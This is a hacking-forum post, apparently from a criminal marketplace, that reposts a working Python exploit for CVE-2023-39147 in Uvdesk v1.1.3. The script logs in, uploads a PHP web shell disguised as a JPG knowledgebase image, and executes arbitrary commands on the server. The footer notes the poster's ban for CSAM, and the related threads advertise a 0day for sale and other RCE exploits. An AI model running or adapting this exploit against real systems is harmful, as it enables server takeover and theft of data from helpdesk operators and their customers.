Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)
by The_Matrix - Wednesday April 10, 2024 at 05:38 PM
#1
Author: DANIEL BARROS
Type: WEBAPPS
Platform: PHP

# Exploit Title: Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated) # Date: 28/07/2023 # Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security # Vendor Homepage: https://www.uvdesk.com # Software Link: https://github.com/uvdesk/community-skeleton # Version: 1.1.3 # Example: python3 CVE-2023-39147.py -u "http://$ip:8000/" -c "whoami" # CVE : CVE-2023-39147 # Tested on: Ubuntu 20.04.6 import requests import argparse def get_args():     parser = argparse.ArgumentParser()     parser.add_argument('-u', '--url', required=True, action='store', help='Target url')     parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')     my_args = parser.parse_args()     return my_args def main():     args = get_args()     base_url = args.url     command = args.command     uploaded_file = "shell.php"     url_cmd = base_url + "//assets/knowledgebase/shell.php?cmd=" + command # Edit your credentials here     login_data = {         "_username": "admin@adm.com",         "_password": "passwd",         "_remember_me": "off"     }     files = {         "name": (None, "pwn"),         "description": (None, "xxt"),         "visibility": (None, "public"),         "solutionImage": (uploaded_file, "<?php system($_GET['cmd']); ?>", "image/jpg")     }     s = requests.session()     # Login     s.post(base_url + "/en/member/login", data=login_data)     # Upload     upload_response = s.post(base_url + "/en/member/knowledgebase/folders/new", files=files)     # Execute command     cmd = s.get(url_cmd)     print(cmd.text) if __name__ == "__main__":     main()

           
----------------------------------------
Am not the owner of this exploit.
Ban reason: CSAM (Permanent)
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [Sell] Calix GPON - Preauth RCE 0day ericki 1 285 06-29-2026, 06:41 AM
Last Post: johnmalkovich1202
  Cool Remote Patching ETW/Amsi PoC pepeloco 6 2,094 02-08-2026, 07:58 AM
Last Post: zeroday99
  CVE-2025-40554 - SolarWinds Web Help Desk Auth Bypass & RCE PoC miyako 3 76 02-07-2026, 03:32 PM
Last Post: cysc
  HPE OneView RCE Exploit [CVE-2025-37164] Hawx01 8 263 02-06-2026, 07:08 PM
Last Post: hacker0123
  WordPress LFI to RCE - CVE-2025-0366 Serious 1 460 02-05-2026, 09:53 AM
Last Post: Sammm89



 Users browsing this thread: 1 Guest(s)